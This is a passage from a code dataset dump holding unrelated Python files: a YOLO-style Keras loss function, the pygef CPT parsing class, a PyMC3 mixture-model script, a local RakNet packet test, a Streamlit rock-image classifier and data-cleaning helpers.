nocl_fill])\n\n ### Loss des positions relatives X et Y\n xy_loss = (K.square(y_true_x - y_pred_x) + K.square(y_true_y - y_pred_y)) * y_true_cf\n xy_loss = K.reshape(xy_loss, (Shape_XY))\n xy_loss = K.repeat_elements(xy_loss, n_features, -1)\n xy_loss = xy_loss * Mask_XY\n\n ### Loss des dimensions normalisées W et H\n wh_loss = (K.square(K.sqrt(y_true_dw) - K.sqrt(y_pred_dw)) + K.square(K.sqrt(y_true_dh) - K.sqrt(y_pred_dh))) * y_true_cf\n wh_loss = K.reshape(wh_loss, (Shape_WH))\n wh_loss = K.repeat_elements(wh_loss, n_features, -1)\n wh_loss = wh_loss * Mask_WH\n\n ### Loss des confidences\n #Converti les données en pixel (utile pour le debug)\n px_tx = y_true_x * cell_w\n px_ty = y_true_y * cell_h\n px_tw = y_true_dw * img_w\n px_th = y_true_dh * img_h\n px_px = y_pred_x * cell_w\n px_py = y_pred_y * cell_h\n px_pw = y_pred_dw * img_w\n px_ph = y_pred_dh * img_h\n \n #Calcul des intersections (xw) des longueurs\n aw = px_tw\n bw = px_pw\n iw = K.abs(px_tx - px_px)\n jw = K.abs((px_tx + px_tw) - (px_px + px_pw))\n xw = K.maximum(K.zeros_like(aw), (aw + bw - iw - jw) / 2.0)\n \n #Calcul des intersections (xh) des hauteurs\n ah = px_ty\n bh = px_ph\n ih = K.abs(px_ty - px_py)\n jh = K.abs((px_ty + px_th) - (px_py + px_ph))\n xh = K.maximum(K.zeros_like(ah), (ah + bh - ih - jh) / 2.0)\n\n #Calcul des surfaces d'intersections et d'unions\n intx_area = xw * xh\n true_area = px_tw * px_th\n pred_area = px_pw * px_ph\n unio_area = pred_area + true_area - intx_area\n\n #Calcul du IOU\n iou = intx_area / unio_area\n\n #Calcul du loss de la confidence \n cf_loss = K.square(y_true_cf * iou - y_pred_cf)\n cf_loss = K.reshape(cf_loss, (Shape_CF))\n cf_loss = K.repeat_elements(cf_loss, n_features, -1)\n cf_loss = cf_loss * Mask_CF\n\n ### Calcul du loss final\n loss = lambda_coord * (xy_loss + wh_loss) + pocl_loss + lambda_noobj * nocl_loss + cf_loss\n\n return loss\n\ndef lossYOLO_1D(y_true, y_pred):\n #Constantes d'apprentissages\n lambda_coord = 5\n lambda_noobj = 0.5\n\n #Exctraction haut niveau des variables\n y_true_class = K.reshape(y_true[..., :L_VOC], (-1, L_VOC))\n y_pred_class = K.reshape(y_pred[..., :L_VOC], (-1, L_VOC))\n y_true_boxes = K.transpose(K.reshape(y_true[..., L_VOC:], (-1, 2+2+1)))\n y_pred_boxes = K.transpose(K.reshape(y_pred[..., L_VOC:], (-1, 2+2+1)))\n y_true_x = y_true_boxes[0]\n y_pred_x = y_pred_boxes[0]\n y_true_y = y_true_boxes[1]\n y_pred_y = y_pred_boxes[1]\n y_true_dw = y_true_boxes[2]\n y_pred_dw = y_pred_boxes[2]\n y_true_dh = y_true_boxes[3]\n y_pred_dh = y_pred_boxes[3]\n y_true_cf = y_true_boxes[4]\n y_pred_cf = y_pred_boxes[4]\n\n ### Loss des classes\n cl_errors = K.sum(K.square(y_true_class - y_pred_class), axis=-1)\n cl_errors = K.repeat_elements(cl_errors, nb_boxes, 0)\n pocl_loss = K.sum(cl_errors * y_true_cf)\n nocl_loss = K.sum(cl_errors * K.abs(1.0 - y_true_cf))\n\n ### Loss des positions relatives X et Y\n xy_loss = K.sum((K.square(y_true_x - y_pred_x) + \n K.square(y_true_y - y_pred_y)) * y_true_cf)\n\n ### Loss des dimensions normalisées W et H\n wh_loss = K.sum((K.square(K.sqrt(y_true_dw) - K.sqrt(y_pred_dw)) + \n K.square(K.sqrt(y_true_dh) - K.sqrt(y_pred_dh))) * y_true_cf)\n\n ### Loss des confidences\n #Converti les données en pixel (utile pour le debug)\n px_tx = y_true_x * cell_w\n px_ty = y_true_y * cell_h\n px_tw = y_true_dw * img_w\n px_th = y_true_dh * img_h\n px_px = y_pred_x * cell_w\n px_py = y_pred_y * cell_h\n px_pw = y_pred_dw * img_w\n px_ph = y_pred_dh * img_h\n \n #Calcul des intersections (xw) des longueurs\n aw = px_tw\n bw = px_pw\n iw = K.abs(px_tx - px_px)\n jw = K.abs((px_tx + px_tw) - (px_px + px_pw))\n xw = K.maximum(K.zeros_like(aw), (aw + bw - iw - jw) / 2.0)\n \n #Calcul des intersections (xh) des hauteurs\n ah = px_ty\n bh = px_ph\n ih = K.abs(px_ty - px_py)\n jh = K.abs((px_ty + px_th) - (px_py + px_ph))\n xh = K.maximum(K.zeros_like(ah), (ah + bh - ih - jh) / 2.0)\n\n #Calcul des surfaces d'intersections et d'unions\n intx_area = xw * xh\n true_area = px_tw * px_th\n pred_area = px_pw * px_ph\n unio_area = pred_area + true_area - intx_area\n\n #Calcul du IOU\n iou = intx_area / unio_area\n\n #Calcul du loss de la confidence \n cf_loss = K.sum(K.square(y_true_cf * iou - y_pred_cf))\n\n #Normalise les loss\n loss_norm = grid_w * grid_h * nb_boxes\n pocl_loss /= loss_norm\n nocl_loss /= loss_norm\n xy_loss /= loss_norm\n wh_loss /= loss_norm\n cf_loss /= loss_norm\n\n #Calcul du loss final\n loss = lambda_coord * (xy_loss + wh_loss) + pocl_loss + lambda_noobj * nocl_loss + cf_loss\n \n return loss\n\ndef createModel():\n #Réseau VGG like (custom)\n model = Sequential()\n model.add(Conv2D( 16, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\", input_shape=(img_h, img_w, 3)))\n model.add(Conv2D( 16, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=2))\n model.add(Conv2D( 32, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n model.add(Conv2D( 32, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=2))\n model.add(Conv2D( 64, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n model.add(Conv2D( 64, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=2))\n model.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n model.add(Conv2D(128, kernel_size=(3, 3), padding='same', activation='elu', data_format=\"channels_last\"))\n model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=2))\n model.add(Flatten())\n model.add(Dense(256, activation='sigmoid'))\n model.add(Dense(grid_w * grid_h * (L_VOC + nb_boxes * (2+2+1)), activation='sigmoid'))\n model.add(Reshape((grid_w * grid_h, (L_VOC + nb_boxes * (2+2+1)))))\n\n optim = keras.optimizers.Adam(lr=0.0001, decay=0.00)\n model.compile(loss=lossYOLO_MultiDimensional, optimizer=optim)\n\n return model\n\n# #######\n# #Sample\n# n_test = 4\n# t_gene = genDataset(n_test)\n# x_test, y_test = next(t_gene)\n# #%matplotlib qt\n# for i in range(n_test):\n# img = getBoxedImg(array_to_img(x_test[i]), y_test[i])\n# plt.subplot(2, 2, i+1)\n# plt.imshow(img)\n# plt.show()\n\n\n# ######\n# #Train\n# model = createModel()\n# model.summary()\n# # model.load_weights('weights.h5')\n# model.fit_generator(genDataset(BatchSize), steps_per_epoch=256, epochs=50)\n# model.save_weights('weights.h5')\n\n#####\n#Sample pred\nmodel = createModel()\nmodel.load_weights('weights.h5')\nn_test = 5*5\nt_gene = genDataset(n_test)\nx_test, y_test = next(t_gene)\ny = model.predict(x_test, verbose=1)\n#%matplotlib qt\nfor i in range(n_test):\n img = getBoxedImg(array_to_img(x_test[i]), y[i], 0.1)\n plt.subplot(5, 5, i+1)\n plt.imshow(img)\nplt.show()\n","sub_path":"yolo_char.py","file_name":"yolo_char.py","file_ext":"py","file_size_in_byte":18680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"233075271","text":"import logging\nfrom typing import Union\n\nimport pygef.plot_utils as plot\nfrom pygef import been_jefferies, robertson\nfrom pygef.base import Base\nfrom pygef.broxml import _BroXmlCpt\nfrom pygef.gef import _GefCpt\nfrom pygef.grouping import GroupClassification\n\nlogger = logging.getLogger(__name__)\n\n\nclass Cpt(Base):\n \"\"\"\n ** Cpt attributes:**\n *Always present:*\n type: str\n Type of the gef file\n project_id: str\n Project id\n x: float\n X coordinate respect to the coordinate system\n y: float\n Y coordinate respect to the coordinate system\n zid: float\n Z coordinate respect to the height system\n height_system: float\n Type of coordinate system, 31000 is NAP\n file_date: datatime.datetime\n Start date time\n test_id: str\n Identifying name of gef file.\n s: str\n String version of gef file.\n df: polars.DataFrame\n DataFrame containing the same column contained in the original .gef file and\n some additional columns [depth, elevation_with_respect_to_nap]\n\n Tip: Use depth column instead of the penetration_length, the depth is corrected\n with the inclination(if present).\n\n Note that the Friction ratio is always calculated from the fs and qc values and not parsed from the file.\n\n If this attribute is called after the classify method the columns relative to the classification\n are also contained.\n\n *Not always present*\n\n default: None\n The description is added only for the most important attributes, for the others check:\n https://publicwiki.deltares.nl/download/attachments/102204318/GEF-CPT.pdf?version=1&modificationDate=1409732008000&api=v2\n\n cpt_class: str\n Cpt class. The format is not standard so it might be not always properly parsed.\n column_void: str\n It is the definition of no value for the gef file\n nom_surface_area_cone_tip: float\n Nom. surface area of cone tip [mm2]\n nom_surface_area_friction_element: float\n Nom. surface area of friction casing [mm2]\n net_surface_area_quotient_of_the_cone_tip: float\n Net surface area quotient of cone tip [-]\n net_surface_area_quotient_of_the_friction_casing: float\n Net surface area quotient of friction casing [-]\n distance_between_cone_and_centre_of_friction_casing: float\n\n friction_present: float\n\n ppt_u1_present: float\n\n ppt_u2_present: float\n\n ppt_u3_present: float\n\n inclination_measurement_present: float\n\n use_of_back_flow_compensator: float\n\n type_of_cone_penetration_test: float\n\n pre_excavated_depth: float\n Pre excavate depth [m]\n groundwater_level: float\n Ground water level [m]\n water_depth_offshore_activities: float\n end_depth_of_penetration_test: float\n stop_criteria: float\n\n zero_measurement_cone_before_penetration_test: float\n\n zero_measurement_cone_after_penetration_test: float\n\n zero_measurement_friction_before_penetration_test: float\n\n zero_measurement_friction_after_penetration_test: float\n\n zero_measurement_ppt_u1_before_penetration_test: float\n\n zero_measurement_ppt_u1_after_penetration_test: float\n\n zero_measurement_ppt_u2_before_penetration_test: float\n\n zero_measurement_ppt_u2_after_penetration_test: float\n\n zero_measurement_ppt_u3_before_penetration_test: float\n\n zero_measurement_ppt_u3_after_penetration_test: float\n\n zero_measurement_inclination_before_penetration_test: float\n\n zero_measurement_inclination_after_penetration_test: float\n\n zero_measurement_inclination_ns_before_penetration_test: float\n\n zero_measurement_inclination_ns_after_penetration_test: float\n\n zero_measurement_inclination_ew_before_penetration_test: float\n\n zero_measurement_inclination_ew_after_penetration_test : float\n\n mileage: float\n \"\"\"\n\n def __init__(self, path=None, content: dict = None):\n \"\"\"\n Cpt class.\n\n Parameters\n ----------\n path:\n Path to the file.\n content: dict\n Dictionary with keys: [\"string\", \"file_type\"]\n - string: str\n String version of the file.\n - file_type: str\n One of [gef, xml]\n \"\"\"\n self.net_surface_area_quotient_of_the_cone_tip = None\n self.pre_excavated_depth = None\n\n super().__init__()\n\n parsed: Union[_BroXmlCpt, _GefCpt]\n\n if content is not None:\n assert (\n content[\"file_type\"] == \"gef\" or content[\"file_type\"] == \"xml\"\n ), f\"file_type can be only one of [gef, xml] \"\n assert content[\"string\"] is not None, \"content['string'] must be specified\"\n if content[\"file_type\"] == \"gef\":\n parsed = _GefCpt(string=content[\"string\"])\n elif content[\"file_type\"] == \"xml\":\n parsed = _BroXmlCpt(string=content[\"string\"])\n\n elif path is not None:\n if path.lower().endswith(\"gef\"):\n parsed = _GefCpt(path)\n elif path.lower().endswith(\"xml\"):\n parsed = _BroXmlCpt(path)\n else:\n raise ValueError(\"One of [path, (string, file_type)] should be not None.\")\n\n self.__dict__.update(parsed.__dict__)\n\n def classify(\n self,\n classification,\n water_level_NAP=None,\n water_level_wrt_depth=None,\n p_a=0.1,\n new=True,\n do_grouping=False,\n min_thickness=None,\n ):\n \"\"\"\n Classify each row of the cpt type.\n\n Parameters\n ----------\n classification: str\n Specify the classification, possible choices : \"robertson\", \"been_jefferies\".\n water_level_NAP: float, only for cpt type, necessary for the classification: give this or water_level_wrt_depth\n Water level with respect to NAP\n water_level_wrt_depth: float, only for cpt type, necessary for the classification: give this or water_level_NAP\n Water level with respect to the ground_level [0], it should be a negative value.\n p_a: float\n Atmospheric pressure. Default: 0.1 MPa.\n new: bool, default:True\n If True and the classification is robertson, the new(2016) implementation of robertson is used.\n do_grouping: bool, optional for the classification\n If True a group classification is added to the plot.\n min_thickness: float, optional for the classification [m]\n If specified together with the do_grouping set to True, a group classification is added to the plot.\n The grouping is a simple algorithm that merge all the layers < min_thickness with the last above one > min_thickness.\n In order to not make a big error do not use a value bigger then 0.2 m\n\n Returns\n -------\n df: polars.DataFrame\n If do_grouping is True a polars.DataFrame with the grouped layer is returned otherwise a polars.DataFrame\n with a classification for each row is returned.\n\n \"\"\"\n # todo: refactor arguments, the arguments connected to each other\n # should be given as a dict or tuple, check order\n water_level_and_zid_NAP = dict(water_level_NAP=water_level_NAP, zid=self.zid)\n\n if water_level_NAP is None and water_level_wrt_depth is None:\n water_level_wrt_depth = -1\n logger.warning(\n f\"You did not input the water level, a default value of -1 m respect to the ground is used.\"\n f\" Change it using the kwagr water_level_NAP or water_level_wrt_depth.\"\n )\n if min_thickness is None:\n min_thickness = 0.2\n logger.warning(\n f\"You did not input the accepted minimum thickness, a default value of 0.2 m is used.\"\n f\" Change it using th kwarg min_thickness\"\n )\n\n if classification == \"robertson\":\n df = robertson.classify(\n self.df,\n water_level_and_zid_NAP=water_level_and_zid_NAP,\n water_level_wrt_depth=water_level_wrt_depth,\n new=new,\n area_quotient_cone_tip=self.net_surface_area_quotient_of_the_cone_tip,\n pre_excavated_depth=self.pre_excavated_depth,\n p_a=p_a,\n )\n if do_grouping:\n return GroupClassification(self.zid, df, min_thickness).df_group\n return df\n\n elif classification == \"been_jefferies\":\n df = been_jefferies.classify(\n self.df,\n water_level_and_zid_NAP=water_level_and_zid_NAP,\n water_level_wrt_depth=water_level_wrt_depth,\n area_quotient_cone_tip=self.net_surface_area_quotient_of_the_cone_tip,\n pre_excavated_depth=self.pre_excavated_depth,\n )\n if do_grouping:\n return GroupClassification(self.zid, df, min_thickness).df_group\n return df\n else:\n raise ValueError(\n f\"Could not find {classification}. Check the spelling or classification not defined in the library\"\n )\n\n def plot(\n self,\n classification=None,\n water_level_NAP=None,\n water_level_wrt_depth=None,\n min_thickness=None,\n p_a=0.1,\n new=True,\n show=False,\n figsize=(11, 8),\n df_group=None,\n do_grouping=False,\n grid_step_x=None,\n dpi=100,\n colors=None,\n z_NAP=False,\n ):\n \"\"\"\n Plot the cpt file and return matplotlib.pyplot.figure .\n\n Parameters\n ----------\n classification: str, only for cpt type\n If classification (\"robertson\", \"been_jefferies\") is specified a subplot is added with the classification\n for each cpt row.\n water_level_NAP: float, only for cpt type, necessary for the classification: give this or water_level_wrt_depth\n Water level with respect to NAP\n water_level_wrt_depth: float, only for cpt type, necessary for the classification: give this or water_level_NAP\n Water level with respect to the ground_level [0], it should be a negative value.\n min_thickness: float, only for cpt type, optional for the classification [m]\n If specified together with the do_grouping set to True, a group classification is added to the plot.\n The grouping is a simple algorithm that merge all the layers < min_thickness with the last above one >\n min_thickness.\n In order to not make a big error do not use a value bigger then 0.2 m\n p_a: float, only for cpt type, optional for the classification\n Atmospheric pressure. Default: 0.1 MPa.\n new: bool, only for cpt type, optional for the classification default:True\n If True and the classification is robertson, the new(2016) implementation of robertson is used.\n show: bool\n If True the plot is showed, else the matplotlib.pytplot.figure is returned\n figsize: tuple\n Figsize of the plot, default (11, 8).\n df_group: polars.DataFrame, only for cpt type, optional for the classification\n Use this argument to plot a defined soil layering next to the other subplots.\n It should contain the columns:\n - layer\n Name of layer, should be either BeenJefferies of Robertson soil type,\n if it is different then also the argument colors should be passed.\n - z_centr_NAP\n Z value of the middle of the layer\n - thickness\n Thickness of the layer\n do_grouping: bool, only for cpt type, optional for the classification\n If True a group classification is added to the plot.\n grid_step_x: float, only for cpt type, default: None\n Grid step for qc and Fr subplots.\n dpi: int\n Dpi figure\n colors: dict\n Dictionary containing the colors associated to each soil type, if specified\n z_NAP: bool\n If True the Z-axis is with respect to NAP.\n Returns\n -------\n matplotlib.pyplot.figure\n \"\"\"\n # todo: refactor arguments, the arguments connected to each other should\n # be given as a dict or tuple, check order\n if classification is None:\n df = self.df\n else:\n df = self.classify(\n classification=classification,\n water_level_NAP=water_level_NAP,\n water_level_wrt_depth=water_level_wrt_depth,\n p_a=p_a,\n new=new,\n )\n\n if df_group is None and do_grouping is True:\n df_group = self.classify(\n classification=classification,\n water_level_NAP=water_level_NAP,\n water_level_wrt_depth=water_level_wrt_depth,\n p_a=p_a,\n new=new,\n do_grouping=True,\n min_thickness=min_thickness,\n )\n\n return plot.plot_cpt(\n df,\n df_group,\n classification,\n show=show,\n figsize=figsize,\n grid_step_x=grid_step_x,\n colors=colors,\n dpi=dpi,\n z_NAP=z_NAP,\n )\n","sub_path":"pygef/cpt.py","file_name":"cpt.py","file_ext":"py","file_size_in_byte":14052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"524025892","text":"# -*- coding: utf-8 -*-\n\nfrom operator import itemgetter\n\n\ndef filter_rows_by_tuple(df, list_of_keys, list_of_values):\n \"\"\"\n Filter rows by tuple of keys\n :param pandas.core.frame.DataFrame df:\n :param list[str] list_of_keys: fields to get values in `list_of_values`\n :param list[tuple] list_of_values: values corresponding with the order of field name\n :return list:\n \"\"\"\n result = []\n if df.empty is False:\n new_df = df.copy()\n\n new_df['grouped_keys'] = df[list_of_keys].apply(lambda row: itemgetter(*list_of_keys)(row), axis=1)\n new_df['is_selected'] = new_df.apply(lambda row: row['grouped_keys'] in list_of_values, axis=1)\n result = new_df['is_selected'].values.tolist()\n return result\n","sub_path":"SI/si_core/utils/dataframe_utils.py","file_name":"dataframe_utils.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"570916237","text":"import sys\nimport numpy as np\nfrom collections import defaultdict\nimport pickle as pkl\n\nimport pymc3 as pm\nimport theano\nimport theano.tensor as tt\n#theano.config.gcc.cxxflags = \"-fbracket-depth=10000\"\nfrom generate_data import generate_data,generate_data_holdout\n\n\ndef GEM(beta):\n \"\"\"griffiths-engen-mccloskey distribution\"\"\"\n pi = tt.concatenate([[1], tt.extra_ops.cumprod(1 - beta)[:-1]])\n return (beta * pi)\n\n\ndef stickbreak_prior(name,a,shape):\n \"\"\"truncated stick-breaking construction\"\"\"\n gamma = pm.Gamma('gamma_{}'.format(name),1.,1.)\n delta = pm.Gamma('delta_{}'.format(name),1.,a)\n beta_prime = tt.stack([pm.Beta('beta_prime_{}_{}'.format(name,k),1.,gamma) for k in range(shape)])\n beta = GEM(beta_prime)\n return(beta*delta)\n\n\ndef loglik(theta,phi):\n def llik(featvar_id):\n lliks = pm.math.logsumexp(tt.log(theta) + tt.dot(featvar_id,tt.log(phi.T)),axis=1)\n return(tt.sum(lliks))\n return(llik)\n\n\ndef fit_model_LN(N,J,D,R,T,Sigmas,featvar_id,filename,c,normalize,batch=False):\n model = pm.Model()\n with model:\n \"\"\"hyperparameters\"\"\"\n theta_prior = stickbreak_prior('theta',1.,T)\n alpha = .1\n \"\"\"priors\"\"\"\n theta = pm.Dirichlet('theta',theta_prior,shape=T)\n psi = [[pm.MvNormal('psi_{}_{}'.format(t,d),mu=tt.zeros(R[d]),cov=tt.exp(-Sigmas[d]),shape=R[d]) for d in range(D)] for t in range(T)]\n phi = tt.stack([tt.concatenate([pm.Deterministic('phi_{}_{}'.format(t,d),\n tt.nnet.softmax(psi[t][d]))[0]\n for d in range(D)]) \n for t in range(T)])\n \"\"\"likelihood\"\"\"\n target = pm.DensityDist('target',loglik(theta=theta,phi=phi),observed=dict(featvar_id=featvar_id))\n \"\"\"fit model\"\"\"\n inference = pm.ADVI()\n inference.fit(100000, obj_optimizer=pm.adam(learning_rate=.01,beta1=.8),callbacks=[pm.callbacks.CheckParametersConvergence()])\n trace = inference.approx.sample()\n posterior = {k:trace[k] for k in trace.varnames if not k.endswith('__')}\n posterior['ELBO'] = inference.hist\n if batch == False:\n f = open('posterior_LN_{}_{}_{}.pkl'.format(filename.split('.')[0],c,normalize),'wb')\n else:\n f = open('posterior_LN_{}_{}_{}_holdout_{}.pkl'.format(filename.split('.')[0],c,normalize,batch),'wb')\n pkl.dump(posterior,f)\n f.close()\n\n\n\ndef fit_model_dir(N,J,D,R,T,featvar_id,filename,c,normalize,batch=False):\n print(normalize)\n print(batch)\n model = pm.Model()\n with model:\n \"\"\"hyperparameters\"\"\"\n theta_prior = stickbreak_prior('theta',1.,T)\n alpha = .1\n \"\"\"priors\"\"\"\n theta = pm.Dirichlet('theta',theta_prior,shape=T)\n phi = tt.stack([tt.concatenate([pm.Dirichlet('phi_{}_{}'.format(t,d),tt.ones(R[d])*alpha,shape=R[d]) for d in range(D)]) for t in range(T)])\n \"\"\"likelihood\"\"\"\n target = pm.DensityDist('target',loglik(theta=theta,phi=phi),observed=dict(featvar_id=featvar_id))\n \"\"\"fit model\"\"\"\n inference = pm.ADVI()\n inference.fit(100000, obj_optimizer=pm.adam(learning_rate=.01,beta1=.8),callbacks=[pm.callbacks.CheckParametersConvergence()])\n trace = inference.approx.sample()\n posterior = {k:trace[k] for k in trace.varnames if not k.endswith('__')}\n posterior['ELBO'] = inference.hist\n if batch == False:\n f = open('posterior_dir_{}_{}_{}.pkl'.format(filename.split('.')[0],c,normalize),'wb')\n else:\n f = open('posterior_dir_{}_{}_{}_holdout_{}.pkl'.format(filename.split('.')[0],c,normalize,batch),'wb')\n pkl.dump(posterior,f)\n f.close()\n\n\nT = 5\ndef main():\n batch = ''\n normalize = True\n if len(sys.argv) < 3:\n print('usage: python DPMM_pm.py DATA_SET_NAME prior={dir,LN} chain normalize{TRUE,FALSE} [hold_out batch]')\n else:\n if len(sys.argv) > 3 and sys.argv[4] == 'FALSE':\n normalize = False\n filename = sys.argv[1]\n print('processing_{}'.format(filename))\n if len(sys.argv) == 7 and sys.argv[5] == 'hold_out':\n batch = sys.argv[6]\n N,J,D,R,Y,Sigmas,hold_in,hold_out,ethnic_id = generate_data_holdout(filename,batch,normalize)\n N,J,D,R,Y,Sigmas,featvar_id,ethnic_id = generate_data(filename,normalize)\n print(D,Y)\n chain = sys.argv[3]\n if sys.argv[2] == 'dir':\n if batch != '':\n fit_model_dir(N,J,D,R,T,hold_in,filename,chain,normalize,batch)\n else:\n fit_model_dir(N,J,D,R,T,featvar_id,filename,chain,normalize)\n if sys.argv[2] == 'LN':\n if batch != '':\n fit_model_LN(N,J,D,R,T,Sigmas,hold_in,filename,chain,normalize,batch)\n else:\n fit_model_LN(N,J,D,R,T,Sigmas,featvar_id,filename,chain,normalize)\n\n\nif __name__=='__main__':\n main()\n","sub_path":"DPMM_pm.py","file_name":"DPMM_pm.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"267114653","text":"import codecs\nimport sys\nimport pyraknet\nimport gevent\nfrom gevent import Greenlet\nimport struct\nimport timeit\nfrom codecs import encode\n\nCLIENT_PORT = 3000\nSERVER_PORT = 4000\n\nTYPE_CLIENT = 0\nTYPE_SERVER = 1\n\nID_GAME_PACKET = pyraknet.ID_USER_PACKET_ENUM + 1\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKCYAN = '\\033[96m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef create_instance(host='127.0.0.1', port=4000):\n peer: pyraknet.RakPeerInterface = pyraknet.RakPeerInterface.GetInstance()\n \n socket_descriptor = pyraknet.SocketDescriptor(port, host)\n \n success = peer.Startup(1, socket_descriptor, 1)\n assert success == pyraknet.RAKNET_STARTED\n\n return peer\n\ndef send_data(peer: pyraknet.RakPeerInterface, address, ms_delay): \n gevent.sleep(ms_delay / 1000)\n packet = b''\n packet += struct.pack('=0.3.2', 'asyncio'],\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3.3\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: POSIX\",\n \"Operating System :: Microsoft :: Windows\",\n \"Topic :: Internet\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Intended Audience :: Developers\",\n \"Development Status :: 2 - Pre-Alpha\"])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"433774718","text":"from fastai.vision import open_image, load_learner, image, torch\nimport streamlit as st\nimport numpy as np\nimport matplotlib.image as mpimg\nimport os\nimport time\nimport PIL.Image\nimport requests\nfrom io import BytesIO\n\n\n#App title\nst.title(\"Rock Classifier\")\n\n\n#loads model and makes prediction\ndef predict(img, display_img):\n\n # Display the test image\n st.image(display_img, use_column_width=True)\n\n # Temporarily displays a message while executing \n with st.spinner('Wait for it...'):\n time.sleep(3)\n\n # Load model and make prediction\n model = load_learner('/home/cate/Cate/DSI/Rock-Classifier/model/', 'stage-1.pkl')\n pred_class = model.predict(img)[0] # get the predicted class\n pred_prob = round(torch.max(model.predict(img)[2]).item()*100) # get the max probability\n \n # Display the prediction\n if str(pred_class) == 'chip':\n st.success(\"This is in class chip with the probability of \" + str(pred_prob) + '%.')\n elif str(pred_class) == 'fines':\n st.success(\"This is in class fines with the probability of \" + str(pred_prob) + '%.')\n elif str(pred_class) == 'lump':\n st.success(\"This is in class lump with the probability of \" + str(pred_prob) + '%.')\n elif str(pred_class) == 'mixed':\n st.success(\"This is in class mixed with the probability of \" + str(pred_prob) + '%.')\n else:\n st.success(\"This is in class pellets with the probability of \" + str(pred_prob) + '%.')\n\noption = st.radio('', ['Choose a test image', 'Choose your own image'])\n\nif option == 'Choose a test image':\n \n # Test image selection\n test_images = os.listdir('/home/cate/Cate/DSI/Rock-Classifier/samp/')\n test_image = st.selectbox(\n 'Please select a test image:', test_images)\n \n # Read the image\n file_path = '/home/cate/Cate/DSI/Rock-Classifier/samp/' + test_image\n img = open_image(file_path)\n \n # Get the image to display\n display_img = mpimg.imread(file_path)\n \n # Predict and display the image\n predict(img, display_img)\n\nelse:\n url = st.text_input(\"Please input a url:\")\n if url != \"\":\n try:\n # Read image from the url\n response = requests.get(url)\n pil_img = PIL.Image.open(BytesIO(response.content))\n display_img = np.asarray(pil_img) # Image to display\n \n # Transform the image to feed into the model\n img = pil_img.convert('RGB')\n img = image.pil2tensor(img, np.float32).div_(255)\n img = image.Image(img)\n \n # Predict and display the image\n predict(img, display_img)\n \n except:\n st.text(\"Invalid url!\")\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"356626252","text":"import os\nimport re\nimport numpy \nimport pandas\nimport datetime\nimport collections\nfrom matplotlib import colors as mcolors\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import cohen_kappa_score\n\ndef getAbsolutePath(fileName):\n script_dir = os.path.dirname(os.path.abspath(__file__))\n return os.path.join(script_dir, '../../' + fileName)\n\ndef removeSpecialCharacters(value):\n return re.sub('[^A-Za-z0-9]+', ' ', str(value))\n\ndef searchInData(data, refString):\n refString = removeSpecialCharacters(refString)\n for x in data:\n if refString in x:\n print(x)\n\ndef cleanDataColumns(data):\n trueCol = []\n for col in data.columns:\n trueCol.append(removeSpecialCharacters(col))\n data.columns = trueCol\n return data\n\ndef cleanCpf(cpfString):\n cpfString = cpfString.replace('.','')\n cpfString = cpfString.replace('-','')\n return int(cpfString) \n\ndef renameColumn(data, oldColumnName, newColumnName):\n columns = list(data.columns)\n if oldColumnName not in columns:\n print('Couldnt find ',oldColumnName)\n return\n colIndex = columns.index(oldColumnName)\n columns[colIndex] = newColumnName\n data.columns = columns\n\n\ndef isDuplicatesPresent(column):\n L = list(column)\n most_common,num_most_common = collections.Counter(L).most_common(1)[0]\n return num_most_common > 1\n \n###############################################################################################################3\n# TALVEZ APARECAM EM OUTROS LUGARES\n###############################################################################################################3\n\ndef _convertStringToFloatLatin(columnToConvert):\n for i in columnToConvert.index:\n try:\n columnToConvert.at[i] = _floatLatin(columnToConvert.loc[i])\n except ValueError:\n print('IN COL: ',col, ' VALUE: ', columnToConvert.at[i], ' IS NOT A FLOAT')\n return\n columnToConvert = columnToConvert.astype(float)\n return columnToConvert\n\ndef _floatLatin(entry):\n if _isNan(entry):\n return numpy.nan\n entry = str(entry).replace(',','.')\n return float(entry)\n\ndef _isNan(value):\n if isinstance(value, str):\n return value == 'nan'\n else:\n return numpy.isnan(value)\n\ndef _convertDateToAgeInYears(data, colName):\n _convertDateToFloatLatin(data,[colName])\n data.loc[:,colName] = data.loc[:,colName] - data.loc[:,' Data']\n data.loc[:,colName] = data.loc[:,colName]/365\n return data\n\n\ndef _convertDateToFloatLatin(data, dateColumns):\n for col in dateColumns:\n columnToConvert = data.loc[:,col]\n for i in columnToConvert.index:\n try:\n columnToConvert.at[i] = 